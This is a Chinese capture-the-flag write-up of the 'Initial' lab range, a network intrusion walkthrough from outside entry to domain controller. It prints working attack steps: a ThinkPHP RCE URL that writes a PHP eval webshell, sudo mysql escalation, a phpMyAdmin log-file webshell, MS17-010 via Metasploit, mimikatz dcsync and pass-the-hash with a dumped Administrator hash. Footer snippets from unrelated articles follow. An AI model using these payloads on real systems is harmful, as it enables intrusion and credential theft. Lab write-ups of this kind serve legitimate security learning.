春秋云镜initial

场景介绍

场景地址:仿真场景-专业徽章 (ichunqiu.com)

靶标介绍:

Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

网络拓扑:(借一张图)
在这里插入图片描述

渗透过程

外网

给了个ip :39.99.255.97

先fscan扫一下

┌──(kali㉿kali)-[~/Desktop/PENTEST]
└─$ ./fscan -h 39.99.255.97 -np -full___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.3
start infoscan
39.99.255.97:22 open
39.99.255.97:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.255.97       code:200 len:5578   title:Bootstrap Material Admin
[+] PocScan http://39.99.255.97 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 25.668141774s

有一个thinkphp的洞。

直接用工具拿shell。但工具貌似不大靠谱:

在这里插入图片描述

直接手打Exp:

/index.php?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php eval($_POST[1]); ?>' > shell.php

在这里插入图片描述

然后蚁剑连接。

然后找flag。当前目录没找着,那么应该就是在root目录下。所以我们需要提权。

尝试sudo -l

在这里插入图片描述

发现可以mysql提权。

照着mysql | GTFOBins来

sudo mysql -e '\! ls /root'
sudo mysql -e '\! ls /root/flag'
sudo mysql -e '\! cat /root/flag/flag01.txt'

在这里插入图片描述

flag01:flag{60b53231-

内网信息收集

接下来就应该打内网了。传一个fscan扫内网。

在这里插入图片描述

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.1.2      is alive
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.18     is alive
(icmp) Target 172.22.1.21     is alive
[*] Icmp alive hosts len is: 4
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.18:3306 open
172.22.1.15:22 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo 
[*]172.22.1.2[->]DC01[->]172.22.1.2
[*] NetInfo 
[*]172.22.1.18[->]XIAORANG-OA01[->]172.22.1.18
[*] NetInfo 
[*]172.22.1.21[->]XIAORANG-WIN7[->]172.22.1.21
[*] OsInfo 172.22.1.2	(Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] MS17-010 172.22.1.21	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 11.722101054s

可以看到172.22.1.21有一个MS17-010永恒之蓝漏洞,172.22.1.18有一个信呼协同OA。

172.22.1.2是域控。

所以思路比较清晰,利用18开的web服务打18这台主机。

用永恒之蓝打下21,然后横向移动打域控。

内网穿透

这时需要我们用打下的172.22.1.15作为跳板,来做一个内网穿透。

这里采用nps。

vps上布置好服务端

在这里插入图片描述

传client到受控主机上,连接。

在这里插入图片描述

然后建一个socks5隧道。

proxifier和proxychains都配置好代理。在这里插入图片描述

在这里插入图片描述

此时浏览器访问172.22.1.18

可以看到就能够成功访问了

在这里插入图片描述

攻陷域内主机

直接扫漏洞是扫不出来的,这里用dirsearch扫下目录。

proxychains4 dirsearch -u http://172.22.1.18

扫出来有phpMyAdmin

在这里插入图片描述

那就应该是弱口令登录后日志写shell了。

root
root

登录后,

SHOW VARIABLES LIKE 'general%';

在这里插入图片描述

set global general_log = "ON";

然后改日志文件路径

set global general_log_file='C:\\phpStudy\\PHPTutorial\\www\\shell.php'

写入webshell

select"<?php @eval($_POST[1]);?>";

然后访问:http://172.22.1.18/shell.php

蚁剑设置好代理

在这里插入图片描述

在这里插入图片描述

然后这个shell连接不是很稳定,最后在C:\Users\Administrator\flag下找到

在这里插入图片描述

flag02.txt: 2ce3-4813-87d4-

MS17-010

接下来就是打域控了,就按着我们的思路先打MS17-010那台机子,然后横向移动打域控。

172.22.1.21

代理启动msf

proxychains4 msfconsole

先用scanner再确定一下:

use auxiliary/scanner/smb/smb_ms17_010
set RHOST 172.22.1.21
exploit

在这里插入图片描述

确定了就开始打。

直接用永恒之蓝打的话是打不通的

在这里插入图片描述

因为目标主机并不出网,所以我们msf要采用正向监听:

set payload windows/x64/meterpreter/bind_tcp_uuid

这时再exploit就成功了

在这里插入图片描述

这个session很不稳定。。。后续操作很容易断。(怀疑可能是nps的性能问题)

重新换frp来内网穿透

frps.ini:

在这里插入图片描述

./frps -c ./frps.ini

然后frpc配置

[common]
server_addr = 43.135.119.99
server_port = 7000
[test]
type = tcp
remote_port = 7778
plugin = socks5
plugin_user = admin
plugin_passwd = admin
use_encryption = true
use_compression = true

在这里插入图片描述

在这里插入图片描述

现在再打就好多了

在这里插入图片描述

内网横向移动 pth

查看uid发现已经是system权限。

然后可以直接用meterpreter的load_kiwi来用Mimikatz

load kiwi

用dcsync来导出域内所有的hash

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

在这里插入图片描述

现在就拿到hash了。

从先前fscan扫描那儿可以看到

172.22.1.2域控开启了445 smb服务

所以接下来我们就用smb来pass the hash执行命令了

我们传递Administrator的hash

10cf89a850fb1cdbe6bb432b859164c8

用kali自带的crackmapexec

先验证下执行情况:

proxychains4 crackmapexec smb 172.22.1.2 -u Administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab --shares

在这里插入图片描述

那么接下来就查看flag03就行了。

proxychains4 crackmapexec smb 172.22.1.2 -u Administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

在这里插入图片描述

flag03:e8f88d0d43d6}

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

在这里插入图片描述

总结

总结:

  1. frp >> nps
  2. Windows代理不稳定,最好用kali的proxychains
  3. 靶机不出网,msf正向监听打永恒之蓝。
  4. crackmapexec横向移动利用smb pth打域控。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/412416.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

WebSocket通信学习笔记

1 简介 WebSocket是一种全双工通信协议&#xff0c;它允许客户端和服务器之间建立持久化的双向连接&#xff0c;从而在不频繁创建HTTP请求的情况下进行实时数据传输。与传统的HTTP协议相比&#xff0c;WebSocket更适合需要实时数据更新的应用场景&#xff0c;如聊天应用、实时…

【Kafka】Windows下安装Kafka(全面)

目录 1.前提条件 2.下载 3.安装 4.环境变量配置 5.验证 1.前提条件 1.先安装zookeeper&#xff1a; 【Zookeeper】Windows下安装Zookeeper&#xff08;全面&#xff09;-CSDN博客https://blog.csdn.net/weixin_57259781/article/details/141679454 2.还需要安装scala: …

虚幻5|技能栏UI优化(2)——优化技能UI并实现技能栏的拖拽操作

这篇文章里&#xff0c;前情提要&#xff0c;文章里的序列变量应命名为序号&#xff0c;我命名错了&#xff0c;虽然不差&#xff0c;但为了后面更好的理解 一.刷新技能栏&#xff0c;用于刷新上一章文章的初始化技能栏 1.打开技能栏格子&#xff0c;打开图表&#xff0c;添加…

【数学建模学习手册】python基本入门使用

本专栏内容为&#xff1a;数学建模原理 记录学习数学建模 &#x1f493;博主csdn个人主页&#xff1a;小小unicorn ⏩专栏分类&#xff1a;数学建模 &#x1f69a;代码仓库&#xff1a;小小unicorn的代码仓库&#x1f69a; &#x1f339;&#x1f339;&#x1f339;关注我带你学…

Cycle inside Runner; building could produce unreliable results.

报错 Showing Recent Messages Cycle inside Runner; building could produce unreliable results. Cycle details: → Target Runner ○ That command depends on command in Target Runner: script phase “Thin Binary” ○ Target Runner has process command with outpu…

Oracle taf高级特性使用

0、taf介绍 TAF是Oracle数据库提供的一个高级特性&#xff0c;旨在实现应用程序在数据库连接中断时的透明重连。它允许应用程序在数据库故障发生时&#xff0c;无需修改代码或手动干预&#xff0c;就能自动连接到新的数据库实例&#xff0c;保证了事务的连续性和应用的高可用性…

Python编码—掌握Python与Kubernetes:构建高效微服务架构

&#x1f31f;&#x1f31f; 欢迎来到我的技术小筑&#xff0c;一个专为技术探索者打造的交流空间。在这里&#xff0c;我们不仅分享代码的智慧&#xff0c;还探讨技术的深度与广度。无论您是资深开发者还是技术新手&#xff0c;这里都有一片属于您的天空。让我们在知识的海洋中…

开源搜索引擎之Solr

Apache Solr 是一个开源的企业级搜索平台&#xff0c;构建在 Apache Lucene 之上&#xff0c;提供了强大的全文搜索、实时索引和分布式搜索能力。Solr 被广泛用于构建高性能的搜索应用程序&#xff0c;支持从简单的搜索引擎到复杂的数据分析平台等多种场景。以下是对 Apache So…

Linux学习笔记(4)----Debian压力测试方法

使用命令行终端压力测试需要两个实用工具&#xff1a;s-tui和stress sudo apt install s-tui stress 安装完成后&#xff0c;在终端中启动 s-tui实用工具&#xff1a; s-tui 执行后如下图&#xff1a; 你可以使用鼠标或键盘箭头键浏览菜单&#xff0c;然后点击“压力选项(Str…

类在JVM中的工作原理

文章目录 引言I 类在JVM中的工作原理class文件的结构类的生命周期II JVM运行时数据区堆栈的意义栈帧内部结构堆III 在JIT中比较常见的优化手段引言 类是一种抽象概念,它是一种模板,用来定义一类事物的属性和行为。类是面向对象编程的基础,它是一种抽象的概念,代表一类事物…

科技赋能 重塑未来医疗丨共谋医疗信息化新方向,2024东北医院信息网络大会圆满落幕!

近年来&#xff0c;随着我国医疗行业信息化的飞跃式发展&#xff0c;医疗信息化已经成为推动医疗行业高质量发展的重要力量之一。自2021年国家卫健委、中医药管理局联合印发《公立医院高质量发展促进行动&#xff08;2021-2025年&#xff09;》以来&#xff0c;各医疗机构将建设…

Ant Design Vue中Modal.confirm无法自动关闭

温馨tips:着急看解决方法可跳过碎碎念~ 前两天经理扔给我一个问题&#xff1a;“这个弹窗怎么关不上了&#xff1f;” 我怀着无所谓的心态&#xff1a;小意思啦&#xff0c;5分钟之内解决完~ …当然flag是不能随便乱立的 拉下来项目&#xff08;原神启动&#xff08;不是&…

商家推广怎么利用C#发送视频短信

视频短信&#xff0c;这一融合了视频、音频与文本的创新通信方式&#xff0c;不仅革新了传统短信的单一形式&#xff0c;更以其独特的魅力带领着移动通信的新风尚。它以移动视频格式为载体&#xff0c;实现了信息传输的多元化&#xff0c;为用户带来不一样的通信体验。 支持免费…

layui栅格布局设置列间距不起作用

layui栅格布局支持设置列间距&#xff0c;只需使用预置类layui-col-space*即可。不过实际使用时却始终看不到效果。   根据layui官网文档的说明&#xff0c;只需要在行所在div元素的class属性中增加layui-col-space*即可出现列间距。如下图所示&#xff1a;   但是实际使用…

2024 年顶级 Flutter UI 框架和库

根据 2022 年 StackOverflow 调查显示&#xff0c;Flutter 是最受欢迎的跨平台工具之一。自发布以来的 16 个月内&#xff0c;已有超过 200 万开发者采用了 Flutter。在本博客中&#xff0c;我们将浏览 GitHub 上可用的顶级 Flutter 存储库。除了每个存储库之外&#xff0c;还提…

Navicat Lite导入为SQL,然后到服务器的SQLServer Management 里执行时,报各种错误,是文件的Encoding不一致导致的解决

1、好多时候&#xff0c;本地的操作系统与服务器的操作系统不一致&#xff0c;有的时候也是历史原因&#xff0c;我们不得不用老旧的版本的数据库&#xff0c;比如 SQLServer 2008R2的数据库系统。 2、然后本地因为操作系统是win11的&#xff0c;导致这个SQLServer 2008R2根本…

萤石云 C++ SDK使用指南

今天继续指南系列&#xff0c;给出了萤石云QtDemo配置使用以及sdk开发中常见问题的指南 SDK下载 一、demo使用配置 1、demo环境配置 Demo 所使用Qt SDK版本&#xff1a;Qt4.8.5 Demo两种开发模式&#xff1a; 下载Qt Creator for Windows&#xff0c;使用Qt Creator作为I…

USR-DR134有人网关如何对接到ThingsPanel

本指南将帮助您使用有人口红串口服务器USR-DR134/USR-DR132将断路器接入ThingsPanel平台。这款创新的超小体积导轨式单串口服务器能够实现RS485/RS232转以太网的双向透传功能&#xff0c;是连接断路器与物联网平台的理想选择。 设备介绍&#xff1a; 口红串口服务器USR-DR134…

解析 uni-app 小程序分包策略:合理优化包体积分布

引言 微信小程序的流行使得越来越多的开发者投入到小程序的开发中。但是&#xff0c;随着项目规模的增大&#xff0c;小程序的性能也会面临一些挑战。其中&#xff0c;小程序分包策略是提升性能的重要一环。 同时&#xff0c;uni-app 的流行也使众多的移动端开发者选择使用 u…

零基础入门转录组数据分析——单基因ROC分析

零基础入门转录组数据分析——单基因ROC分析 目录 零基础入门转录组数据分析——单基因ROC分析1. ROC分析的基础知识2. 单基因ROC分析&#xff08;Rstudio&#xff09;——代码实操2. 1 数据处理2. 2 单基因ROC分析2. 3 ROC曲线简单可视化 1. ROC分析的基础知识 1.1 ROC分析是…